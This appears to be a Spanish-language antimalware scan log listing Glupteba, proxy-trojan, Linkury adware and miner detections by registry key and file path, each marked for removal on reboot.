Trojan.Glupteba.BITSRST, HKU\S-1-5-21-1649130365-987012723-906343211-1000_Classes\INTERFACE\{1B71F23B-E61F-45C9-83BA-235D55F50CF9}, Se eliminará al reiniciar, 1138, 781246, , , , 
Trojan.Glupteba.BITSRST, HKU\S-1-5-21-1649130365-987012723-906343211-1000_Classes\INTERFACE\{1b7aed4f-fcaf-4da4-8795-c03e635d8edc}, Se eliminará al reiniciar, 1138, 781246, , , , 
Trojan.Glupteba.BITSRST, HKU\S-1-5-21-1649130365-987012723-906343211-1000_Classes\INTERFACE\{22A68885-0FD9-42F6-9DED-4FB174DC7344}, Se eliminará al reiniciar, 1138, 781246, , , , 
Trojan.Glupteba.BITSRST, HKU\S-1-5-21-1649130365-987012723-906343211-1000_Classes\INTERFACE\{2EB31403-EBE0-41EA-AE91-A1953104EA55}, Se eliminará al reiniciar, 1138, 781246, , , , 
Trojan.Glupteba.BITSRST, HKU\S-1-5-21-1649130365-987012723-906343211-1000_Classes\INTERFACE\{385ED83D-B50C-4580-B2C3-9E64DBE7F511}, Se eliminará al reiniciar, 1138, 781246, , , , 
Trojan.Glupteba.BITSRST, HKU\S-1-5-21-1649130365-987012723-906343211-1000_Classes\INTERFACE\{390AF5A7-1390-4255-9BC9-935BFCFA5D57}, Se eliminará al reiniciar, 1138, 781246, , , , 
Trojan.Glupteba.BITSRST, HKU\S-1-5-21-1649130365-987012723-906343211-1000_Classes\INTERFACE\{3A4E62AE-45D9-41D5-85F5-A45B77AB44E5}, Se eliminará al reiniciar, 1138, 781246, , , , 
Trojan.Glupteba.BITSRST, HKU\S-1-5-21-1649130365-987012723-906343211-1000_Classes\INTERFACE\{48F49A60-AFA8-469D-98EA-64075FA6A1D6}, Se eliminará al reiniciar, 1138, 781246, , , , 
Trojan.Glupteba.BITSRST, HKU\S-1-5-21-1649130365-987012723-906343211-1000_Classes\INTERFACE\{53de12aa-df96-413d-a25e-c75b6528abf2}, Se eliminará al reiniciar, 1138, 781246, , , , 
Trojan.Glupteba.BITSRST, HKU\S-1-5-21-1649130365-987012723-906343211-1000_Classes\INTERFACE\{5d65dd0d-81bf-4ff4-aeea-6effb445cb3f}, Se eliminará al reiniciar, 1138, 781246, , , , 
Trojan.Glupteba.BITSRST, HKU\S-1-5-21-1649130365-987012723-906343211-1000_Classes\INTERFACE\{8B9F14F4-9559-4A3F-B7D0-312E992B6D98}, Se eliminará al reiniciar, 1138, 781246, , , , 
Trojan.Glupteba.BITSRST, HKU\S-1-5-21-1649130365-987012723-906343211-1000_Classes\INTERFACE\{944903E8-B03F-43A0-8341-872200D2DA9C}, Se eliminará al reiniciar, 1138, 781246, , , , 
Trojan.Glupteba.BITSRST, HKU\S-1-5-21-1649130365-987012723-906343211-1000_Classes\INTERFACE\{9E1CD0DF-72E7-4284-9598-342C0A46F96B}, Se eliminará al reiniciar, 1138, 781246, , , , 
Trojan.Glupteba.BITSRST, HKU\S-1-5-21-1649130365-987012723-906343211-1000_Classes\INTERFACE\{a7126d4c-f492-4eb9-8a2a-f673dbdd3334}, Se eliminará al reiniciar, 1138, 781246, , , , 
Trojan.Glupteba.BITSRST, HKU\S-1-5-21-1649130365-987012723-906343211-1000_Classes\INTERFACE\{AF60000F-661D-472A-9588-F062F6DB7A0E}, Se eliminará al reiniciar, 1138, 781246, , , , 
Trojan.Glupteba.BITSRST, HKU\S-1-5-21-1649130365-987012723-906343211-1000_Classes\INTERFACE\{B54E7079-90C9-4C62-A6B8-B2834C33A04A}, Se eliminará al reiniciar, 1138, 781246, , , , 
Trojan.Glupteba.BITSRST, HKU\S-1-5-21-1649130365-987012723-906343211-1000_Classes\INTERFACE\{b5c25645-7426-433f-8a5f-42b7ff27a7b2}, Se eliminará al reiniciar, 1138, 781246, , , , 
Trojan.Glupteba.BITSRST, HKU\S-1-5-21-1649130365-987012723-906343211-1000_Classes\INTERFACE\{C0995E25-0B96-40FE-A31A-96EA3EEE1600}, Se eliminará al reiniciar, 1138, 781246, , , , 
Trojan.Glupteba.BITSRST, HKU\S-1-5-21-1649130365-987012723-906343211-1000_Classes\INTERFACE\{c1439245-96b4-47fc-b391-679386c5d40f}, Se eliminará al reiniciar, 1138, 781246, , , , 
Trojan.Glupteba.BITSRST, HKU\S-1-5-21-1649130365-987012723-906343211-1000_Classes\INTERFACE\{D0ED5C72-6197-4AAD-9B16-53FE461DD85C}, Se eliminará al reiniciar, 1138, 781246, , , , 
Trojan.Glupteba.BITSRST, HKU\S-1-5-21-1649130365-987012723-906343211-1000_Classes\INTERFACE\{d8c80ebb-099c-4208-afa3-fbc4d11f8a3c}, Se eliminará al reiniciar, 1138, 781246, , , , 
Trojan.Glupteba.BITSRST, HKU\S-1-5-21-1649130365-987012723-906343211-1000_Classes\INTERFACE\{f0440f4e-4884-4a8F-8a45-ba89c00f96f2}, Se eliminará al reiniciar, 1138, 781246, , , , 
Trojan.Glupteba.BITSRST, HKU\S-1-5-21-1649130365-987012723-906343211-1000_Classes\INTERFACE\{F062BA81-ADFE-4A92-886A-23FD851D6406}, Se eliminará al reiniciar, 1138, 781246, , , , 
Trojan.Glupteba.BITSRST, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\ScheduledUpdate, Se eliminará al reiniciar, 1138, 781246, , , , 
Trojan.Glupteba.BITSRST, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{2AB8537C-159B-455D-9813-C7CB0BC69A90}, Se eliminará al reiniciar, 1138, 781246, , , , 
Trojan.Glupteba.BITSRST, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\LOGON\{2AB8537C-159B-455D-9813-C7CB0BC69A90}, Se eliminará al reiniciar, 1138, 781246, , , , 
Trojan.Glupteba.BITSRST, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\{025EAD11-7928-4F28-8569-C009EE9DCFED}, Se eliminará al reiniciar, 1138, 781246, , , , 
Trojan.Glupteba.BITSRST, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{48185BB3-FC80-4AC8-82B8-38BFFAE0455F}, Se eliminará al reiniciar, 1138, 781246, , , , 
Trojan.Glupteba.BITSRST, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\PLAIN\{48185BB3-FC80-4AC8-82B8-38BFFAE0455F}, Se eliminará al reiniciar, 1138, 781246, , , , 
Trojan.Glupteba.BITSRST, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\{111E94BF-2FBE-4662-8EE2-E722532AD46A}, Se eliminará al reiniciar, 1138, 781246, , , , 
Trojan.Glupteba.BITSRST, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{E9E54652-C473-4C56-83B9-E608F8FB8CA7}, Se eliminará al reiniciar, 1138, 781246, , , , 
Trojan.Glupteba.BITSRST, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\PLAIN\{E9E54652-C473-4C56-83B9-E608F8FB8CA7}, Se eliminará al reiniciar, 1138, 781246, , , , 
Trojan.Glupteba.BITSRST, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\{31B64B79-FB77-4D0C-9E0A-E7C533D051B9}, Se eliminará al reiniciar, 1138, 781246, , , , 
Trojan.Glupteba.BITSRST, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{4019DA72-1B00-4FAD-8052-F0518E2C1509}, Se eliminará al reiniciar, 1138, 781246, , , , 
Trojan.Glupteba.BITSRST, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\PLAIN\{4019DA72-1B00-4FAD-8052-F0518E2C1509}, Se eliminará al reiniciar, 1138, 781246, , , , 
Trojan.Glupteba.BITSRST, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\{76188DFE-44A0-4E86-B159-FCBB9C714646}, Se eliminará al reiniciar, 1138, 781246, , , , 
Trojan.Glupteba.BITSRST, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{5C5F48DD-AAC1-4A2B-826F-9791035D4DC1}, Se eliminará al reiniciar, 1138, 781246, , , , 
Trojan.Glupteba.BITSRST, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\PLAIN\{5C5F48DD-AAC1-4A2B-826F-9791035D4DC1}, Se eliminará al reiniciar, 1138, 781246, , , , 
Trojan.Glupteba.BITSRST, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\{C7F81ED6-E5AB-4DE6-A61C-1C27DBDDC7F1}, Se eliminará al reiniciar, 1138, 781246, , , , 
Trojan.Glupteba.BITSRST, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{0914E1B1-22EB-4FEB-8194-425AA2933CBD}, Se eliminará al reiniciar, 1138, 781246, , , , 
Trojan.Glupteba.BITSRST, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\PLAIN\{0914E1B1-22EB-4FEB-8194-425AA2933CBD}, Se eliminará al reiniciar, 1138, 781246, , , , 
Trojan.Glupteba.BITSRST, HKU\S-1-5-21-1649130365-987012723-906343211-1000\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\UNINSTALL\CloudNet, Se eliminará al reiniciar, 1138, 781246, , , , 
Trojan.Glupteba.E, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\Winmon, Se eliminará al reiniciar, 494, 781215, , , , 
Trojan.Glupteba.E, HKU\S-1-5-21-1649130365-987012723-906343211-1000\SOFTWARE\EpicNet Inc., Se eliminará al reiniciar, 494, 781249, 1.0.21478, , ame, 
Trojan.Agent.PrxySvrRST, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{A19BCAF8-246C-4F2A-AC23-4A816DEDFE85}, Se eliminará al reiniciar, 1171, 784089, 1.0.21478, , ame, 
Trojan.Agent.PrxySvrRST, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\NLASVC\PARAMETERS\INTERNET\MANUALPROXIES, Se eliminará al reiniciar, 1171, -1, 0.0.0, , action, 
Trojan.Glupteba.E, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\WinmonFS, Se eliminará al reiniciar, 494, 781211, 1.0.21478, , ame, 
Trojan.Glupteba.E, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\WinmonProcessMonitor, Se eliminará al reiniciar, 494, 781210, 1.0.21478, , ame, 
Trojan.Agent.PrxySvrRST, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\LOGON\{A19BCAF8-246C-4F2A-AC23-4A816DEDFE85}, Se eliminará al reiniciar, 1171, 784090, , , , 
Trojan.Agent.PrxySvrRST, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\MICROSOFT\WINDOWS\TIME SYNCHRONIZATION\ViewUtcTime, Se eliminará al reiniciar, 1171, 784090, 1.0.21478, , ame, 
PUP.Optional.Linkury.ACMB1, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\EVENTLOG\APPLICATION\Application Hosting, Se eliminará al reiniciar, 922, 259928, 1.0.21478, , ame, 
Generic.Malware/Suspicious, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\OSPPSVC.EXE, Se eliminará al reiniciar, 0, 392686, , , , 
Generic.Malware/Suspicious, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\SppSvc.exe, Se eliminará al reiniciar, 0, 392686, , , , 
Generic.Malware/Suspicious, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\OSPPSVC.EXE, Se eliminará al reiniciar, 0, 392686, , , , 
Generic.Malware/Suspicious, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\SppSvc.exe, Se eliminará al reiniciar, 0, 392686, , , , 

Valor del registro: 26
PUP.Optional.Linkury.ACMB1, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS|APPINIT_DLLS, Se eliminará al reiniciar, 922, -1, 0.0.0, , action, 
PUP.Optional.Linkury.ACMB1, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS|APPINIT_DLLS, Se eliminará al reiniciar, 922, -1, 0.0.0, , action, 
PUP.Optional.Linkury.ACMB1, HKU\S-1-5-21-1649130365-987012723-906343211-1000\ENVIRONMENT|SNF, Se eliminará al reiniciar, 922, -1, 0.0.0, , action, 
PUP.Optional.Linkury.ACMB1, HKU\S-1-5-21-1649130365-987012723-906343211-1000\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{ielnksrch}|URL, Se eliminará al reiniciar, 922, 259987, 1.0.21478, , ame, 
PUP.Optional.Linkury, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\ielnksrch|DISPLAYNAME, Se eliminará al reiniciar, 266, 259314, 1.0.21478, , ame, 
PUP.Optional.Linkury.ACMB1, HKU\S-1-5-21-1649130365-987012723-906343211-1000\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHURL|DEFAULT, Se eliminará al reiniciar, 922, 259988, 1.0.21478, , ame, 
Trojan.Glupteba.E, HKU\S-1-5-21-1649130365-987012723-906343211-1000\SOFTWARE\MICROSOFT\TESTAPP|DEFENDER, Se eliminará al reiniciar, 494, 781336, 1.0.21478, , ame, 
Adware.Linkury, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\BACKLH|IMAGEPATH, Se eliminará al reiniciar, 424, 379533, 1.0.21478, , ame, 
PUP.Optional.Linkury, HKU\S-1-5-21-1649130365-987012723-906343211-1000\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{ielnksrch}|DISPLAYNAME, Se eliminará al reiniciar, 266, 259313, 1.0.21478, , ame, 
Trojan.Agent, HKU\S-1-5-21-1649130365-987012723-906343211-1000\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|FLORALSHAPE, Se eliminará al reiniciar, 491, 196479, 1.0.21478, , ame, 
Adware.Tuto4PC.Generic, HKU\S-1-5-21-1649130365-987012723-906343211-1000\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|2301610, Se eliminará al reiniciar, 3712, 667274, 1.0.21478, , ame, 
Trojan.Glupteba.BITSRST, HKU\S-1-5-21-1649130365-987012723-906343211-1000\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|Chromium, Se eliminará al reiniciar, 1138, 781246, , , , 
Trojan.Glupteba.BITSRST, HKU\S-1-5-21-1649130365-987012723-906343211-1000\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN|CLOUDNET, Se eliminará al reiniciar, 1138, 781246, 1.0.21478, , ame, 
PUP.Optional.Linkury.ACMB1, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\ielnksrch|URL, Se eliminará al reiniciar, 922, 259989, 1.0.21478, , ame, 
Trojan.Glupteba.E, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{968BD611-9D62-4C37-B71A-BA21308BDE53}|PATH, Se eliminará al reiniciar, 494, 781231, 1.0.21478, , ame, 
Trojan.Agent.PrxySvrRST, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{A19BCAF8-246C-4F2A-AC23-4A816DEDFE85}|PATH, Se eliminará al reiniciar, 1171, 784089, 1.0.21478, , ame, 
Trojan.Agent.PrxySvrRST, HKU\S-1-5-18\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS|PROXYENABLE, Se eliminará al reiniciar, 1171, -1, 0.0.0, , action, 
Trojan.Agent.PrxySvrRST, HKU\S-1-5-21-1649130365-987012723-906343211-1000\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS|PROXYENABLE, Se eliminará al reiniciar, 1171, -1, 0.0.0, , action, 
Trojan.Agent.PrxySvrRST, HKU\S-1-5-21-1649130365-987012723-906343211-500\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS|PROXYENABLE, Se eliminará al reiniciar, 1171, -1, 0.0.0, , action, 
Trojan.Agent.PrxySvrRST, HKU\S-1-5-21-1649130365-987012723-906343211-1000\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS|PROXYOVERRIDE, Se eliminará al reiniciar, 1171, -1, 0.0.0, , action, 
Trojan.Agent.PrxySvrRST, HKU\.DEFAULT\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS|PROXYENABLE, Se eliminará al reiniciar, 1171, -1, 0.0.0, , action, 
Trojan.FakeMS, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{C0DBCC98-BB2A-447E-8147-5E4759E9D96D}|PATH, Se eliminará al reiniciar, 3119, 461394, 1.0.21478, , ame, 
PUP.Optional.Linkury.ACMB1, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\CLOUDPRINTER|IMAGEPATH, Se eliminará al reiniciar, 922, 259916, 1.0.21478, , ame, 
PUP.Optional.Linkury.ACMB1, HKU\S-1-5-21-1649130365-987012723-906343211-1000\ENVIRONMENT|SNF, Se eliminará al reiniciar, 922, 259517, 1.0.21478, , ame, 
PUP.Optional.Linkury.ACMB1, HKU\S-1-5-21-1649130365-987012723-906343211-1000\ENVIRONMENT|SNP, Se eliminará al reiniciar, 922, 259518, 1.0.21478, , ame, 
Trojan.Agent, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\WINDEFENDER|IMAGEPATH, Se eliminará al reiniciar, 491, 428246, 1.0.21478, , ame, 

Datos del registro: 8
PUP.Optional.Linkury, HKU\S-1-5-21-1649130365-987012723-906343211-1000\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES|DEFAULTSCOPE, Se reemplazará al reiniciar, 266, 293476, 1.0.21478, , ame, 
PUP.Optional.Linkury.ACMB1, HKU\S-1-5-21-1649130365-987012723-906343211-1000\SOFTWARE\MICROSOFT\INTERNET EXPLORER\MAIN|SEARCH PAGE, Se reemplazará al reiniciar, 922, 293485, 1.0.21478, , ame, 
PUP.Optional.Linkury.ACMB1, HKU\S-1-5-21-1649130365-987012723-906343211-1000\SOFTWARE\MICROSOFT\INTERNET EXPLORER\MAIN|SEARCH BAR, Se reemplazará al reiniciar, 922, 293485, 1.0.21478, , ame, 
PUP.Optional.Linkury.ACMB1, HKU\S-1-5-21-1649130365-987012723-906343211-1000\SOFTWARE\MICROSOFT\INTERNET EXPLORER\MAIN|START PAGE, Se reemplazará al reiniciar, 922, 293485, 1.0.21478, , ame, 
PUP.Optional.Linkury.ACMB1, HKU\S-1-5-21-1649130365-987012723-906343211-1000\SOFTWARE\MICROSOFT\INTERNET EXPLORER\MAIN|SEARCHASSISTANT, Se reemplazará al reiniciar, 922, 293485, 1.0.21478, , ame, 
PUP.Optional.Linkury.ACMB1, HKU\S-1-5-21-1649130365-987012723-906343211-1000\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCH|DEFAULT_SEARCH_URL, Se reemplazará al reiniciar, 922, 293486, 1.0.21478, , ame, 
PUP.Optional.Linkury, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES|DEFAULTSCOPE, Se reemplazará al reiniciar, 266, 293477, 1.0.21478, , ame, 
Adware.SonicSearch, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\SEARCHURL|DEFAULT, Se reemplazará al reiniciar, 13600, 693611, 1.0.21478, , ame, 

Secuencia de datos: 0
(No hay elementos maliciosos detectados)

Carpeta: 8
PUP.Optional.Linkury.ACMB1, C:\PROGRAMDATA\CLOUDPRINTER, Se eliminará al reiniciar, 922, 259506, 1.0.21478, , ame, 
PUP.Optional.CloudNet, C:\USERS\MARCO AVILA\APPDATA\LOCAL\TEMP\CSRSS, Se eliminará al reiniciar, 5975, 448845, 1.0.21478, , ame, 
RiskWare.BitCoinMiner, C:\USERS\MARCO AVILA\APPDATA\LOCAL\TEMP\WUP, Se eliminará al reiniciar, 855, 512161, 1.0.21478, , ame, 
Adware.Linkury, C:\ProgramData\Logic Cramble\X64, Se eliminará al reiniciar, 424, 431817, , , , 
Adware.Linkury, C:\ProgramData\Logic Cramble\X86, Se eliminará al reiniciar, 424, 431817, , , , 
Adware.Linkury, C:\PROGRAMDATA\LOGIC CRAMBLE, Se eliminará al reiniciar, 424, 431817, 1.0.21478, , ame, 
Trojan.Glupteba.BITSRST, C:\Users\MARCO AVILA\AppData\Roaming\EpicNet Inc\CloudNet, Se eliminará al reiniciar, 1138, 781247, , , , 
Trojan.Glupteba.BITSRST, C:\USERS\MARCO AVILA\APPDATA\ROAMING\EPICNET INC, Se eliminará al reiniciar, 1138, 781247, 1.0.21478, , ame, 

Archivo: 57
PUP.Optional.Linkury.ACMB1, C:\PROGRAMDATA\CLOUDPRINTER\CLOUDPRINTER.DAT, Se eliminará al reiniciar, 922, 259506, 1.0.21478, , ame, 
PUP.Optional.Linkury.ACMB1, C:\ProgramData\CloudPrinter\CloudPrinter.exe, Se eliminará al reiniciar, 922, 259506, , , , 
PUP.Optional.Linkury.ACMB1, C:\ProgramData\CloudPrinter\Config.xml, Se eliminará al reiniciar, 922, 259506, , , , 
PUP.Optional.Linkury.ACMB1, C:\WINDOWS\SYSWOW64\FINDIT.XML, Se eliminará al reiniciar, 922, 259512, 1.0.21478, , ame, 
Adware.Linkury.Generic, C:\USERS\MARCO AVILA\APPDATA\LOCAL\AGENT.DAT, Se eliminará al reiniciar, 3753, 404872, 1.0.21478, , ame, 
Adware.Linkury.Generic, C:\USERS\MARCO AVILA\APPDATA\LOCAL\UNINSTALL_TEMP.ICO, Se eliminará al reiniciar, 3753, 404862, 1.0.21478, , ame, 
Trojan.FakeMS, C:\WINDOWS\SYSTEM32\TASKS\SYSTEM\SYSTEMCHECK, Se eliminará al reiniciar, 3119, 414093, 1.0.21478, , ame, 
Adware.Linkury.Generic, C:\USERS\MARCO AVILA\APPDATA\LOCAL\NOAH.DAT, Se eliminará al reiniciar, 3753, 404865, 1.0.21478, , ame, 
PUP.Optional.CloudNet, C:\USERS\MARCO AVILA\APPDATA\LOCAL\TEMP\CSRSS\CLOUDNET.EXE, Se eliminará al reiniciar, 5975, 448845, 1.0.21478, , ame, 
Trojan.Agent, C:\WINDOWS\WINDEFENDER.EXE, Se eliminará al reiniciar, 491, 455564, 1.0.21478, , ame, 
Adware.Linkury.Generic, C:\USERS\MARCO AVILA\APPDATA\LOCAL\MD.XML, Se eliminará al reiniciar, 3753, 404866, 1.0.21478, , ame, 
Adware.Linkury.Generic, C:\USERS\MARCO AVILA\APPDATA\LOCAL\Plustech.tst, Se eliminará al reiniciar, 3753, 404871, 1.0.21478, , ame, 
Adware.Linkury.Generic, C:\USERS\MARCO AVILA\APPDATA\LOCAL\Techsing.tst, Se eliminará al reiniciar, 3753, 404871, 1.0.21478, , ame, 
Adware.Linkury.Generic, C:\USERS\MARCO AVILA\APPDATA\LOCAL\MAIN.DAT, Se eliminará al reiniciar, 3753, 442900, 1.0.21478, , ame, 
Trojan.Agent, C:\USERS\MARCO AVILA\APPDATA\LOCAL\LOBBY.DAT, Se eliminará al reiniciar, 491, 712637, 1.0.21478, , ame, 
Adware.Linkury, C:\PROGRAMDATA\LOGIC CRAMBLE\SET.EXE, Se eliminará al reiniciar, 424, 379533, , , , 
Trojan.Agent, C:\USERS\MARCO AVILA\APPDATA\LOCAL\APPLICATIONHOSTING.DAT, Se eliminará al reiniciar, 491, 712640, 1.0.21478, , ame, 
RiskWare.BitCoinMiner, C:\USERS\MARCO AVILA\APPDATA\LOCAL\TEMP\WUP\WUP.EXE, Se eliminará al reiniciar, 855, 512161, 1.0.21478, , ame, 
Generic.Malware/Suspicious, C:\USERS\MARCO AVILA\APPDATA\LOCAL\TECHSING.EXE, Se eliminará al reiniciar, 0, 392686, 1.0.21478, , shuriken, 
Generic.Malware/Suspicious, C:\USERS\MARCO AVILA\APPDATA\LOCAL\PLUSTECH.EXE, Se eliminará al reiniciar, 0, 392686, 1.0.21478, , shuriken, 
Adware.Linkury, C:\USERS\MARCO AVILA\APPDATA\LOCAL\installer.dat, Se eliminará al reiniciar, 424, 715618, 1.0.21478, , ame, 
Adware.Linkury, C:\WINDOWS\SYSWOW64\CONFIG\SYSTEMPROFILE\APPDATA\LOCAL\installer.dat, Se eliminará al reiniciar, 424, 715618, 1.0.21478, , ame, 
Trojan.Agent, C:\WINDOWS\RSS\CSRSS.EXE, Se eliminará al reiniciar, 491, 196479, , , , 
Trojan.Agent, C:\WINDOWS\SYSTEM32\TASKS\csrss, Se eliminará al reiniciar, 491, 196479, , , , 
Adware.Tuto4PC.Generic, C:\USERS\MARCO AVILA\APPDATA\LOCAL\TEMP\IS-LRH00.TMP\MOULIALEFIL.EXE, Se eliminará al reiniciar, 3712, 667274, , , , 
Generic.Malware/Suspicious, C:\PROGRAMDATA\ERRORRESPONDER\LAOWOWIDOCMEYWA.EXE, Se eliminará al reiniciar, 0, 392686, 1.0.21478, , shuriken, 
Trojan.Glupteba.BITSRST, C:\USERS\MARCO, Se eliminará al reiniciar, 1138, 781246, , , , 
Trojan.Glupteba.BITSRST, C:\USERS\MARCO AVILA\APPDATA\LOCAL\CHROMIUM\APPLICATION\CHROME.EXE, Se eliminará al reiniciar, 1138, 781246, , , , 
Trojan.Glupteba.BITSRST, C:\WINDOWS\SYSTEM32\TASKS\ScheduledUpdate, Se eliminará al reiniciar, 1138, 781246, , , , 
Trojan.Glupteba.BITSRST, C:\WINDOWS\SYSTEM32\TASKS\{025EAD11-7928-4F28-8569-C009EE9DCFED}, Se eliminará al reiniciar, 1138, 781246, , , , 
Trojan.Glupteba.BITSRST, C:\WINDOWS\SYSTEM32\TASKS\{111E94BF-2FBE-4662-8EE2-E722532AD46A}, Se eliminará al reiniciar, 1138, 781246, , , , 
Trojan.Glupteba.BITSRST, C:\WINDOWS\SYSTEM32\TASKS\{31B64B79-FB77-4D0C-9E0A-E7C533D051B9}, Se eliminará al reiniciar, 1138, 781246, , , , 
Trojan.Glupteba.BITSRST, C:\WINDOWS\SYSTEM32\TASKS\{76188DFE-44A0-4E86-B159-FCBB9C714646}, Se eliminará al reiniciar, 1138, 781246, , , , 
Trojan.Glupteba.BITSRST, C:\WINDOWS\SYSTEM32\TASKS\{C7F81ED6-E5AB-4DE6-A61C-1C27DBDDC7F1}, Se eliminará al reiniciar, 1138, 781246, , , , 
Trojan.Glupteba.BITSRST, C:\USERS\MARCO AVILA\APPDATA\ROAMING\EPICNET INC\CLOUDNET\CLOUDNET.EXE, Se eliminará al reiniciar, 1138, 781246, , , , 
Trojan.Glupteba.E, C:\WINDOWS\SYSTEM32\DRIVERS\WINMON.SYS, Se eliminará al reiniciar, 494, 781215, 1.0.21478, , ame, 
Trojan.Glupteba.E, C:\WINDOWS\SYSTEM32\DRIVERS\WINMONFS.SYS, Se eliminará al reiniciar, 494, 781211, , , , 
Trojan.Glupteba.E, C:\WINDOWS\SYSTEM32\DRIVERS\WINMONPROCESSMONITOR.SYS, Se eliminará al reiniciar, 494, 781210, , , , 
Trojan.Agent.PrxySvrRST, C:\WINDOWS\SYSTEM32\TASKS\MICROSOFT\WINDOWS\TIME SYNCHRONIZATION\VIEWUTCTIME, Se eliminará al reiniciar, 1171, 784090, , , , 
Adware.Linkury, C:\ProgramData\Logic Cramble\X64\SQLite.Interop.dll, Se eliminará al reiniciar, 424, 431817, , , , 
Adware.Linkury, C:\ProgramData\Logic Cramble\X86\SQLite.Interop.dll, Se eliminará al reiniciar, 424, 431817, , , , 
Adware.Linkury, C:\ProgramData\Logic Cramble\Config.json, Se eliminará al reiniciar, 424, 431817, , , , 
Adware.Linkury, C:\ProgramData\Logic Cramble\set.exe.config, Se eliminará al reiniciar, 424, 431817, , , , 
Adware.Linkury, C:\ProgramData\Logic Cramble\System.Data.SQLite.dll, Se eliminará al reiniciar, 424, 431817, , , , 
Adware.Linkury, C:\ProgramData\Logic Cramble\System.Data.SQLite.Linq.dll, Se eliminará al reiniciar, 424, 431817, , , , 
Adware.Linkury, C:\ProgramData\Logic Cramble\System.Data.SQLite.xml, Se eliminará al reiniciar, 424, 431817, , , , 
